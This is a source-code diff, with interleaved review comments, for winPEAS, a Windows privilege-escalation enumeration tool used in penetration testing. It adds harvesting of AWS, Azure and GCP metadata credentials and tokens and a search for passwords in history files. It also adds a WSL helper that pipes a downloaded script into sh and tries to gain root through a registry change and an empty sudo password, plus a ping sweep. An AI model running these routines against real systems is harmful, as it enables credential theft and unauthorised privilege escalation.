orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo
orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", "");
string folder = Path.GetDirectoryName(orig_filepath);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", autorunLocation[0] + "\\" + reg},
@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo
string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE"));
usersPath = Directory.GetParent(usersPath).FullName;
var config = YamlConfigHelper.GetWindowsSearchConfig();
var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value;
// add .* around each element to match the whole line
var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*");
pwdInsideHistory = string.Join("|", items);
try
{
if (Directory.Exists(usersPath))
@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo
foreach (string filepath in files)
{
var fileContent = File.ReadAllText(filepath);
var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false);
// remove all non-printable and control characters
sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList();
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
string folder = Path.GetDirectoryName(filepath);
results.Add(new Dictionary<string, string>() {
{ "Reg", "" },
@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" },
{ "sensitiveInfoList", string.Join(", ", sensitiveInfoList) },
});
}
}
@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo
{
try
{
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths);
results.Add(new Dictionary<string, string>() {
{ "Reg", "" },
{ "RegKey", "" },
@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", ""},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo
try
{
string folder = Path.GetDirectoryName(filepathCleaned);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", ""},
@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo
if (File.Exists(path))
{
string folder = Path.GetDirectoryName(path);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths);
results.Add(new Dictionary<string, string>
{
@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
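Review bot: `config.variables.FirstOrDefault(...).value` dereferences the result without a null check, so if `pwd_inside_history` is missing from the YAML (and the element type is a class) a `NullReferenceException` is thrown before the `try` that follows, aborting the whole enumeration; prefer `var pwdInsideHistory = config.variables.FirstOrDefault(...)?.value;` and skip the content search when it is null. In the same hunk, `Select(s => s = Regex.Replace(...))` assigns to the lambda parameter for no effect — `Select(s => Regex.Replace(s, @"\p{C}+", string.Empty))` is equivalent. Every `var injectablePaths = new List<string>();` immediately followed by `out injectablePaths` (this hunk and the four that repeat it below) is dead initialization; `out var injectablePaths` expresses it directly and the file already uses C# 7 features. The `.*{v}.*` patterns built here go to `FileAnalysis.SearchContent`, which in this commit doubles backslashes before compiling — confirm the configured values contain no regex escapes.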


@ -0,0 +1,201 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class AWSInfo : CloudInfoBase
{
/*
* notes - possible identification:
*
- "c:\Program Files\Amazon\EC2Launch"
- "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
- "c:\Program Files (x86)\AWS SDK for .NET"
- get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ"
*/
const string AWS_FOLDER = "c:\\Program Files\\Amazon\\";
const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token";
const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data";
public override string Name => "AWS EC2";
private Dictionary<string, List<EndpointData>> _endpointData = null;
public override bool IsCloud => Directory.Exists(AWS_FOLDER);
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } });
_endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN));
_endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN));
_endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN));
_endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN));
_endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN));
_endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN));
/*
* print_3title "SSM Runnig"
ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
*
*/
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetSecurityCredentialsMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetUserDataMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("user-data", "latest/user-data", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetIAMRoleMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>
{
new Tuple<string, string, bool>("iam/info", "iam/info", false)
};
var url = $"{METADATA_URL_BASE}/iam/security-credentials/";
var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
foreach (var role in roles.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>(role, $"iam/security-credentials/{role}", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetNetworkMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var url = $"{METADATA_URL_BASE}/network/interfaces/macs/";
var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
var urlBase = "network/interfaces/macs";
foreach (var mac in macs.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Owner ID", $"{urlBase}/{mac}/owner-id", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public Hostname", $"{urlBase}/{mac}/public-hostname", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Security Groups", $"{urlBase}/{mac}/security-groups", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetAccountMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("account info", "identity-credentials/ec2/info", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetGeneralMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ami id", "ami-id", false),
new Tuple<string, string, bool>("instance action","instance-action", false),
new Tuple<string, string, bool>("instance id","instance-id", false),
new Tuple<string, string, bool>("instance life-cycle","instance-life-cycle", false),
new Tuple<string, string, bool>("instance type","instance-type", false),
new Tuple<string, string, bool>("placement/region","placement/region", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData, string apiToken)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null;
}
}
}


@ -0,0 +1,88 @@
using System.Collections.Generic;
using System.IO;
using System.Net;
using System;
namespace winPEAS.Info.CloudInfo
{
internal class AzureInfo : CloudInfoBase
{
public override string Name => "Azure VM";
public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure";
const string AZURE_BASE_URL = "http://169.254.169.254/metadata/";
const string API_VERSION = "2021-12-13";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
List<EndpointData> _endpointDataList = new List<EndpointData>();
try
{
string result;
List<Tuple<string, string, bool>> endpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Details", $"instance?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true),
new Tuple<string, string, bool>("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true),
new Tuple<string, string, bool>("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true),
new Tuple<string, string, bool>("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true)
};
if (IsAvailable)
{
foreach (var tuple in endpoints)
{
string url = $"{AZURE_BASE_URL}{tuple.Item2}";
result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
}
else
{
foreach (var endpoint in endpoints)
{
_endpointDataList.Add(new EndpointData()
{
EndpointName = endpoint.Item1,
Data = null,
IsAttackVector = false
});
}
}
_endpointData.Add("General", _endpointDataList);
}
catch (Exception ex)
{
}
}
return _endpointData;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null;
}
}
}
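Review bot: The `catch (Exception ex) { }` closing `EndpointDataList` swallows every failure silently and leaves `ex` unused, so a malformed response or a bug in the endpoint loop yields an empty result with no trace of why, while the sibling AWSInfo and GCPInfo classes report the message. Make this class consistent with them: add `using winPEAS.Helpers;` and replace the empty body with `Beaprint.PrintException(ex.Message);`. Note also that `_endpointData.Add("General", _endpointDataList);` sits after the loop inside the `try`, so a throw mid-loop returns a dictionary with no "General" key at all; adding the list before the loop (or in a `finally`) would keep the partial results that were already collected.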


@ -0,0 +1,77 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace winPEAS.Info.CloudInfo
{
internal abstract class CloudInfoBase
{
public abstract string Name { get; }
public abstract bool IsCloud { get; }
public abstract Dictionary<string, List<EndpointData>> EndpointDataList();
public abstract bool TestConnection();
private bool? _isAvailable;
public bool IsAvailable
{
get
{
if (_isAvailable == null)
{
_isAvailable = TestConnection();
}
return _isAvailable.Value;
}
}
protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null)
{
try
{
var request = WebRequest.CreateHttp(url);
if (headers != null)
{
request.Headers = headers;
}
request.Method = method;
using (var response = (HttpWebResponse)request.GetResponse())
{
using (var responseStream = response.GetResponseStream())
{
// Get a reader capable of reading the response stream
using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8))
{
// Read stream content as string
var content = myStreamReader.ReadToEnd();
return content;
}
}
}
}
catch (WebException exception)
{
if (exception.InnerException != null)
{
return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty;
}
}
catch (Exception ex)
{
return string.Empty;
}
return string.Empty;
}
}
}
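Review bot: `CreateMetadataAPIRequest` never sets `request.Timeout`, so it inherits HttpWebRequest's default of 100 seconds; on a host where the link-local metadata address silently drops packets instead of refusing the connection, `TestConnection` and then every per-endpoint call can stall for that long. Set a short bound with `const int METADATA_TIMEOUT_MS = 2000;` on the class (value to tune) and `request.Timeout = METADATA_TIMEOUT_MS;`, and treat a timeout as "unreachable" rather than "reachable but errored": a timed-out `WebException` typically carries no InnerException, so it currently falls through to `return string.Empty`, which `TestConnection` reads as available. An exception filter placed before the existing catch, `catch (WebException exception) when (exception.Status == WebExceptionStatus.Timeout || exception.Status == WebExceptionStatus.ConnectFailure) { return null; }`, covers both cases. The null-versus-empty return contract is the whole basis of `IsAvailable` and deserves an XML `<returns>` comment saying exactly that; `ex` in the final catch is unused.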


@ -0,0 +1,10 @@
namespace winPEAS.Info.CloudInfo
{
internal class EndpointData
{
public string EndpointName { get; set; }
public string Data { get; set; }
public bool IsAttackVector { get; set; }
}
}
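Review bot: The three properties carry contracts the callers in this commit rely on but nothing here states: `Data` is set to `null` by AWSInfo, AzureInfo and GCPInfo when the metadata service is unreachable and is an empty string when the request failed in another way, and `IsAttackVector` is set to true only for the Azure token endpoints. Add XML summaries to that effect, e.g. `/// <summary>Raw response body; null when the metadata endpoint was unreachable, empty when the request failed otherwise.</summary>` on `Data`, so the presentation code (outside this chunk) does not have to rediscover the null case.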


@ -0,0 +1,208 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class GCPInfo : CloudInfoBase
{
public override string Name => "Google Cloud Platform";
const string GCP_BASE_URL = "http://{URL_BASE}/";
const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\";
/*
C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe"
C:\Program Files\Google\OSConfig\google_osconfig_agent.exe"
c:\Program Files (x86)\Google\Cloud SDK"
http://metadata.google.internal
*/
public override bool IsCloud => Directory.Exists(GCP_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
_endpointData.Add("GC Project Info", GetGCProjectMetadataInfo());
_endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo());
_endpointData.Add("Instance Info", GetInstanceMetadataInfo());
_endpointData.Add("Interfaces", GetInterfacesMetadataInfo());
_endpointData.Add("User Data", GetUserMetadataInfo());
_endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo());
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetServiceAccountsMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var serviceAccountsEndpointUrlBase = "instance/service-accounts";
var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}";
var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
// TODO
// echo " Name: $sa" - ignored for now
foreach (var serviceAccount in serviceAccounts.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetUserMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("startup-script", "instance/attributes/startup-script", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInterfacesMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var networkEndpointUrlBase = "instance/network-interfaces";
var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}";
var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
foreach (var iface in ifaces.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("IP", $"{networkEndpointUrlBase}/{iface}ip", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Network", $"{networkEndpointUrlBase}/{iface}network", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInstanceMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Description", "instance/description", false),
new Tuple<string, string, bool>("Hostname", "instance/hostname", false),
new Tuple<string, string, bool>("Instance ID", "instance/id", false),
new Tuple<string, string, bool>("Instance Image", "instance/image", false),
new Tuple<string, string, bool>("Machine Type", "instance/machine-type", false),
new Tuple<string, string, bool>("Instance Name", "instance/name", false),
new Tuple<string, string, bool>("Instance tags", "instance/scheduling/tags", false),
new Tuple<string, string, bool>("Zone", "instance/zone", false),
new Tuple<string, string, bool>("K8s Cluster Location", "instance/attributes/cluster-location", false),
new Tuple<string, string, bool>("K8s Cluster name", "instance/attributes/cluster-name", false),
new Tuple<string, string, bool>("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false),
new Tuple<string, string, bool>("K8s Kube-labels", "instance/attributes/kube-labels", false),
new Tuple<string, string, bool>("K8s Kubeconfig", "instance/attributes/kubeconfig", false),
new Tuple<string, string, bool>("K8s Kube-env", "instance/attributes/kube-env", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetOSLoginMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("OSLogin users", "oslogin/users", false),
new Tuple<string, string, bool>("OSLogin Groups", "oslogin/groups", false),
new Tuple<string, string, bool>("OSLogin Security Keys", "oslogin/security-keys", false),
new Tuple<string, string, bool>("OSLogin Authorize", "oslogin/authorize", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetGCProjectMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Project-ID", "project/project-id", false),
new Tuple<string, string, bool>("Project Number", "project/numeric-project-id", false),
new Tuple<string, string, bool>("Project SSH-Keys", "project/attributes/ssh-keys", false),
new Tuple<string, string, bool>("All Project Attributes", "project/attributes/?recursive=true", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result?.Trim(),
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null;
}
}
}
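Review bot: `GCP_BASE_URL` is the literal string `"http://{URL_BASE}/"` — there is no `$` prefix, so the braces are not an interpolation, and nothing ever substitutes them — which means `TestConnection` hands an invalid URI to `CreateMetadataAPIRequest`. `WebRequest.CreateHttp` should reject it with a `UriFormatException`, which the base class's generic catch turns into `string.Empty`, so `TestConnection` returns true on every machine and `IsAvailable` never reflects reality for GCP. Replace it with the real host the comment block above already names, `const string GCP_BASE_URL = "http://metadata.google.internal/";`, or probe `METADATA_URL_BASE` directly. A smaller inconsistency: the service-account `Token` entry is registered with `IsAttackVector = false` while the equivalent Azure token endpoints use `true`, and `"K8s OSLoging enabled"` looks like a typo in a user-visible label.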


@ -0,0 +1,136 @@
using System;
using System.Diagnostics;
using System.Text;
using winPEAS.Helpers.Registry;
namespace winPEAS.Info.FilesInfo.WSL
{
public class WSLHelper
{
public static void RunLinpeas(string linpeasUrl)
{
string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
var cmd = CreateUnixCommand(linpeasCmd);
ExecuteCommand(cmd.Item1, cmd.Item2);
}
internal static Tuple<string, string> CreateUnixCommand(string command, string distributionName = null)
{
string wsl = Environment.Is64BitProcess
? "wsl.exe"
: Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe";
string distributionParam = !string.IsNullOrEmpty(distributionName)
? $"--distribution {distributionName}"
: string.Empty;
string args = $"{distributionParam} -- {command}";
return new Tuple<string, string>(wsl, args);
}
static string GetWSLUser(string distributionName)
{
string command = "whoami";
var cmd = CreateUnixCommand(command, distributionName);
var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim();
return user;
}
internal static string TryGetRootUser(string distributionName, string distributionGuid)
{
string hive = "HKCU";
string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}";
string key = "DefaultUid";
string wslUser = GetWSLUser(distributionName);
string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0";
string root = $"root ({exploit})";
if (string.Equals(wslUser, "root"))
{
return "root";
}
var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
if (isValueChanged)
{
wslUser = GetWSLUser(distributionName);
if (string.Equals(wslUser, "root"))
{
RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
return root;
}
}
// try sudo without password
exploit = "sudo with empty password";
var cmd = CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName);
var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2);
if (output == "root")
{
return $"root ({exploit})";
}
return wslUser;
}
private static string ExecuteCommandWaitForOutput(string cmd, string args)
{
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.FileName = cmd;
p.StartInfo.Arguments = args;
p.StartInfo.StandardOutputEncoding = Encoding.UTF8;
p.Start();
string output = p.StandardOutput.ReadToEnd()?.Trim();
p.WaitForExit();
return output;
}
private static void ExecuteCommand(
string command,
string args = null,
string workingFolder = null
)
{
var processStartInfo = new ProcessStartInfo
{
UseShellExecute = false,
Verb = "OPEN",
CreateNoWindow = true,
FileName = command,
WorkingDirectory = workingFolder,
Arguments = args,
RedirectStandardOutput = true,
RedirectStandardError = true,
StandardOutputEncoding = Encoding.UTF8
};
using (var process = Process.Start(processStartInfo))
{
if (process != null)
{
while (!process.StandardOutput.EndOfStream)
{
Console.WriteLine(process.StandardOutput.ReadLine());
}
while (!process.StandardError.EndOfStream)
{
Console.WriteLine(process.StandardError.ReadLine());
}
}
}
}
}
}
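Review bot: `TryGetRootUser` writes `DefaultUid = 0` into the user's Lxss registry key but restores `originalDefaultUserValue` only on the success path (inside the second `if (string.Equals(wslUser, "root"))`); if the write succeeded but `whoami` did not report root, or `GetWSLUser` throws, the modified value is left behind on the audited host and the following sudo check runs against the altered configuration. The restore should run whenever `isValueChanged` is true, in a `finally` around the second `GetWSLUser` call, as sketched below. Separately, `ExecuteCommandWaitForOutput` redirects stderr but never reads it, so a chatty command can fill the pipe and deadlock `ReadToEnd`; either drop `RedirectStandardError = true` there or drain both streams as `ExecuteCommand` does, and dispose the `Process` (`using (var p = new Process())`).
```csharp
// … unchanged: hive/path/key setup and the first whoami check …
var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
if (isValueChanged)
{
    try
    {
        wslUser = GetWSLUser(distributionName);
    }
    finally
    {
        // always put the user's configuration back, whatever whoami returned
        RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
    }
    if (string.Equals(wslUser, "root"))
    {
        return root;
    }
}
// … unchanged: sudo check and final return …
```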


@ -0,0 +1,56 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetPinger
{
private int PingTimeout = 1000;
public List<string> HostsAlive = new List<string>();
private List<string> ipRange = new List<string>();
public void AddRange(string baseIpAddress, string netmask)
{
var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList();
var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1]));
ipRange.AddRange(range);
}
public void AddRange(IEnumerable<string> ipAddressList)
{
ipRange.AddRange(ipAddressList);
}
public async Task RunPingSweepAsync()
{
var tasks = new List<Task>();
foreach (var ip in ipRange)
{
Ping p = new Ping();
var task = PingAndUpdateStatus(p, ip);
tasks.Add(task);
}
await Task.WhenAll(tasks);
}
private async Task PingAndUpdateStatus(Ping ping, string ip)
{
var reply = await ping.SendPingAsync(ip, PingTimeout);
if (reply.Status == IPStatus.Success)
{
HostsAlive.Add(ip);
await Console.Out.WriteLineAsync(ip);
}
}
}
}
